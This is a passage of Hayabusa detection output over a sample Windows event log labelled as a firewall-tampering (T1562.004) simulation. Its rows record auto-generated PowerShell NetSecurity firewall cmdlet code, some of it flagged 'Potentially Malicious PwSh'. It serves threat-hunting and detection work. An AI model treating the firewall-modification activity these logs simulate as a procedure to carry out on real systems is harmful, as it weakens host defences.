$true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.027 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.027 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.027 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.028 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.075 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.075 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.076 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.076 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.077 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.078 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.110 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall 
rule activation.evtx 2021-04-23 19:09:45.111 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.112 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.112 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module 
$script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] 
${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
